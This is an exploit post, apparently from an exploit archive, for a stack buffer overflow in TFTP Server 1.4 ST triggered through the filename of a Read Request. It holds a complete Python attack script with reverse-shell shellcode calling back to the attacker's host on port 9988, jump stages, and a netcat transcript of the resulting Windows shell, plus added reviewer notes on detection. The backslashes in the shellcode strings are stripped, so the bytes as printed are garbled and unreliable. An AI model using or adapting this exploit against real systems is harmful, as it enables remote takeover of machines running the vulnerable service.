
TFTP Server 1.4 ST RRQ Overflow

Posted on 11 January 2012

#!/usr/bin/python
#---------------------------------------------------------------------------#
# Exploit: TFTP SERVER V1.4 ST (RRQ Overflow)
# OS: Windows XP PRO SP3
# Author: b33f
#---------------------------------------------------------------------------#
# Smashing the stack for fun and practise...
#
# This tftp service have been pwned extensively:
# (1) Muts ==> WRQ Overflow
#     http://www.exploit-db.com/exploits/5314/
# (2) Molotov ==> WRQ Overflow
#     http://www.exploit-db.com/exploits/10542/
# (3) tixxDZ ==> ERROR Overflow
#     http://www.exploit-db.com/exploits/5563/
#
# Vulnerable software:
# http://www.exploit-db.com/application/5314/
#---------------------------------------------------------------------------#
# After some simple fuzzing with spike I discovered that sending a Read
# Request (RRQ) packet can also trigger a buffer overflow...
#---------------------------------------------------------------------------#
# It might take up to 30 seconds for some reason but the shell does appear
# as expected....
#
# root@bt:~# nc -lvp 9988
# listening on [any] 9988 ...
# 192.168.111.128: inverse host lookup failed: Unknown server error
# connect to [192.168.111.132] from (UNKNOWN) [192.168.111.128] 1072
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\TFTPServer>
#---------------------------------------------------------------------------#
#
# Reviewer notes (defensive context, added on review):
# - Vulnerability class: a stack-based overflow reached through the filename
#   field of a TFTP Read Request (opcode 0x01), per the author's notes above.
#   The overflow itself is not visible from this script; where the copy
#   happens in the server binary would have to be confirmed separately.
# - The author lists three earlier overflows in the same product (WRQ and
#   ERROR packets); this is a fourth entry point. Treat the product version
#   as unsafe to expose on any network rather than as a single-bug issue.
# - Detection: a legitimate RRQ carries a short path. The request built at
#   the bottom of this file carries a filename field of roughly 1.5 KB
#   (1487 bytes of stage4/padding plus three short trailer stages), which is
#   a simple length-based signal for TFTP traffic monitoring.
# - NOTE(review): as rendered on this page the escape sequences inside the
#   string literals have been mangled, so the byte counts quoted in the
#   author's comments cannot be verified from this listing.
#---------------------------------------------------------------------------#

import socket
import sys

# Target service: TFTP listens on UDP/69. Both values are hard-coded for the
# author's lab network (see the nc transcript above).
host = '192.168.111.128'
port = 69

# UDP socket for the single datagram sent at the end of the script.
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
    # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit;
    # a plain `socket.error` handler would be the targeted form.
    print "socket() failed"
    sys.exit(1)

# Payload generation command recorded by the author (kept verbatim):
#msfpayload windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9988 R| msfencode -b 'x00'
#x86/shikata_ga_nai succeeded with size 341 (iteration=1)
shell = (
"xbbx3cxefxdbxc5xdbxddxd9x74x24xf4x5ax29xc9xb1"
"x4fx31x5ax14x83xc2x04x03x5ax10xdex1ax27x2dx97"
"xe5xd8xaexc7x6cx3dx9fxd5x0bx35xb2xe9x58x1bx3f"
"x82x0dx88xb4xe6x99xbfx7dx4cxfcx8ex7ex61xc0x5d"
"xbcxe0xbcx9fx91xc2xfdx6fxe4x03x39x8dx07x51x92"
"xd9xbax45x97x9cx06x64x77xabx37x1exf2x6cxc3x94"
"xfdxbcx7cxa3xb6x24xf6xebx66x54xdbxe8x5bx1fx50"
"xdax28x9exb0x13xd0x90xfcxffxefx1cxf1xfex28x9a"
"xeax75x43xd8x97x8dx90xa2x43x18x05x04x07xbaxed"
"xb4xc4x5cx65xbaxa1x2bx21xdfx34xf8x59xdbxbdxff"
"x8dx6dx85xdbx09x35x5dx42x0bx93x30x7bx4bx7bxec"
"xd9x07x6exf9x5bx4axe7xcex51x75xf7x58xe2x06xc5"
"xc7x58x81x65x8fx46x56x89xbax3exc8x74x45x3exc0"
"xb2x11x6ex7ax12x1axe5x7ax9bxcfxa9x2ax33xa0x09"
"x9bxf3x10xe1xf1xfbx4fx11xfaxd1xf9x16x6dx1ax51"
"xf7xeaxf2xa0x07xd4x06x2cxe1x70x17x78xbaxecx8e"
"x21x30x8cx4fxfcxd0x2dxddx9bx20x3bxfex33x77x6c"
"x30x4ax1dx80x6bxe4x03x59xedxcfx87x86xcexcex06"
"x4ax6axf5x18x92x73xb1x4cx4ax22x6fx3ax2cx9cxc1"
"x94xe6x73x88x70x7exb8x0bx06x7fx95xfdxe6xcex40"
"xb8x19xfex04x4cx62xe2xb4xb3xb9xa6xc5xf9xe3x8f"
"x4dxa4x76x92x13x57xadxd1x2dxd4x47xaaxc9xc4x22"
"xafx96x42xdfxddx87x26xdfx72xa7x62")

#---------------------------------------------------------------------------#
# Author's description of the stages (kept as written):
# (1) Stage1: 0x00409605 TFTPServer.exe - PPR
#     => 3-byte overwrite using the mandatory protocol null-byte.
# (2) Stage2: jump back 5-bytes "xEBxF9" so we have room for a far jump.
# (3) Stage3: jump back 1490-bytes to the beginning of our buffer.
# (4) Stage4: reverse shell port 9988 - size 341
#---------------------------------------------------------------------------#
stage4 = "x90"*50 + shell
stage3 = "xE9x2ExFAxFFxFF"
stage2 = "xEBxF9x90x90"
stage1 = "x05x96x40"

# The whole payload travels in the RRQ filename field: stage4 first, padded
# with "A" up to 1487 bytes, then the three short trailer stages.
filename = stage4 + "A"*(1487-len(stage4)) + stage3 + stage2 + stage1
mode = "netascii"

# TFTP RRQ layout (RFC 1350): 2-byte opcode 0x0001, filename, NUL, mode, NUL.
# The trailing NUL after the filename is the "mandatory protocol null-byte"
# the author's stage1 note refers to.
youlose = "x00x01" + filename + "x00" + mode + "x00"

# Single fire-and-forget datagram; UDP gives no delivery or crash feedback,
# which is why the author watches the nc listener instead.
s.sendto(youlose, (host, port))

 
